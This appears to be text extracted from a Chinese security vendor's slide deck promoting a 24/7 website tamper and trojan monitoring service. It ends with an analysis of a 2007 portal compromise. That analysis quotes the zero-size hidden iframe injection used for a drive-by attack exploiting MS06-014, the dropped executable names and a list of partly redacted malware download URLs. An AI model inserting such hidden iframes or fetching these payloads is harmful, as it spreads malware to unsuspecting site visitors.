e眼-网站全天候值守专家.pptVIP

石家庄政府网 2007年安全事件分类统计 Web网站攻击来源统计 关键技术阐述-WEB扫描模块 关键技术阐述-异常和木马检测流程 主要功能描述 网页内容合规性监控检查 篡改 木马 网站访问性能检查 访问性能测试 可用性可访问性检查 定期压力测试 页面交易和网上交易监控 模拟终端用户行为,检验通过网页执行交易的步骤 每个交易查询等相关页面的可访问性可用性检查 寻找性能瓶颈和经常出问题的页面 按照一个固定的交易流程轮寻检查每一步骤的延时是否超过预设的阀值 对每个交易页面的内容进行合法性检查 提供业务流程的整体性能图表 主要功能描述 网页内容篡改主动防御措施 主要功能描述 远程企业信息安全日志监控分析和审计 IDS\IPS等安全设备日志分析和审计 WEB服务器日志分析和审计 分析流程如下 通过在客户内网安装日志收集器每日定期采集日志信息 日志信息在特定的时间主动发送到网盾监控平台 网盾安全专家对日志进行人工分析和审计 形成日志分析日报通过监控平台发送给客户 主要功能 定期内外扫描服务和渗透测试服务 通过网盾信息安全专家定期上门进行内部网络漏洞扫描 按照客户要求定期对电子商务网站和交易网站进行渗透测试 形成专门的测试和渗透报告,并提出针对性的整改建议 针对邮件服务和办公自动化的检测和监控服务 与目前流行的网页防篡改产品比较 外挂轮巡技术 使用外部的网页读取和检测程序，以轮询方式读出和比对要监控的网页 核心内嵌技术 篡改检测模块内嵌于Web服务器软件，在每一个网页流出时进行完整性检查 事件触发技术 使用操作系统的文件系统/驱动程序接口，网页文件被修改时进行合法性检查 网页防篡改产品技术分析 网盾e眼远程监控服务平台技术优势 特点综述 以外挂轮巡为基础,兼顾核心内嵌和事件触发技术,从而弥补外挂轮巡的不足 每五分钟对整个网站页面轮巡一遍 核心内嵌技术-网页防篡改过滤器 主动过滤跨站点攻击 主动过滤sql攻击行为 主动过滤各种网页挂马行为 动态网页防护 事件触发技术 当发现篡改行为发生后,及时将监控中心发现的异常URL对应的网页进行阻拦显示,并快速恢复。 该外挂轮巡为客户网站系统外轮巡，不占用客户带宽。 快速比对分析工具，准确快速定位变动位置和内容 网盾e眼远程监控服务平台技术优势 更多功能 交易安全监控功能 远程安全服务管理中心 在线收集安全设备日志 人工分析日志 形成日志分析和审计报告 网站访问性能评测 7*24小时专家人工值守 投入资金建设网盾远程信息安全服务中心 专门的信息安全专家 专用的网络带宽 集中的监控机房 大屏幕全景监控设施 完善的服务流程和监控机房管理制度 网盾e眼远程监控服务平台技术优势 完善翔实的监控报表 每日变动总结分析 综合描述 饼图 分栏目详细描述 网页变动报告 交易软件和各种下载软件监控报告 页面交易监控报告 性能趋势图 变动内容描述和快照留影 精确到秒的变动时间 分项目的处理意见 每月的综合分析报表 页面异常监控 交易软件监控 新的对比分析 2007年1月11日，硅谷动力网站(www.eN)被黑客植入病毒，用户如果访问该网站，将会被病毒感染，由于该网站是有一定影响力的IT门户网站，日访问量达1800万次，所挂木马，又包含现在较为流行的熊猫烧香以及黄金甲等。因此会造成较大的危害。 　　攻击者利用MS06-014漏洞来传播木马，该网站的各页面上，被添加了如下内容，iframe src=/worm.htm width=0 height=0/iframe，在恶意网站/worm.htm中包含iframe src=muma.htm width=0 height=0/iframe。试图通过多次页面跳转来躲避查杀。　　当用户点击网页后，系统就会自动从恶意网站上下载并运行多个恶意程序。首先下载/worm.exe（Trojan-Dropper.Win32.Delf.or）到本地系统，衍生到系统的临时目录，改名为svch0st.exe，然后复制副本到%system%\下，并改名为spoclsv.exe，该木马还会下载如下木马到本地系统： http://58.215.xx.164/down/wormcn.txthttp://58.215.xx.164/down/cq.exehttp://58.215.xx.164/down/ly.exehttp://58.215.xx.164/down/my.exehttp://58.215.xx.164/down/rx.exehttp://58.215.xx.164/down/wl.exehttp://58.215.xx.164/down/wow.exehttp://58.215.xx.164/down/zt.exe/down/dj.exe/down/kr/itembay.ex